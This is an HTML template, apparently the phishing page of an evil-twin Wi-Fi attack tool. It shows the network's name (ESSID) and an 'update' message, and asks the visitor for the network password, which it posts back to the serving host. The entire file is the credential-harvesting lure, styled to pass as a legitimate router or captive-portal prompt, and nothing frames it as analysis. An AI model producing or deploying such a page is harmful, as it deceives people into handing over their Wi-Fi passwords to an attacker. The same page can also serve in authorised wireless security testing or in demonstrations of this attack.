<!DOCTYPE html>
<html lang="{lang}">
  <head>
    <title>{essid}</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
      body {
        background-color: rgb(241, 241, 241);
        font-family: arial, sans-serif;
        text-align: center;
        color: #000000;
      }
      .update {
        display: inline-block;
        margin-top: 50px;
        max-width: 350px;
        width: 100%;
      }
      h1 {
        margin-bottom: -10px;
      }
      input {
        width: 90%;
        height: 36px;
        padding-left: 10px;
        background-color: #dbdbdb;
        border: 0px;
        border-radius: 18px;
        margin-bottom: 10px;
      }
      input[type=submit] {
        cursor: pointer;
        margin-top: 20px;
        background-color: rgb(190, 159, 159);
        font-weight: bold;
        color: #000000;
      }
      input:focus {
        box-shadow: inset 0px 0px 6px 2px rgba(191,191,191,1);
        outline: none;
      }
      input[type=submit]:hover, input[type=submit]:active {
        box-shadow: 0px 0px 18px -5px rgba(0,0,0,0.75);
        outline: none;
      }
    </style>
  </head>
  <body>
    <div class="update">
      <h1>{essid}</h1>
      <p>{info}</p>
      <form action="/" method="POST">
        <input type="text" id="s" name="s" value="s" hidden>
        <input type="password" id="pass" name="pass" placeholder="{password}" minlength="6" required>
        <input type="submit" value="{confirm}">
      </form>
    </div>
  </body>
</html>
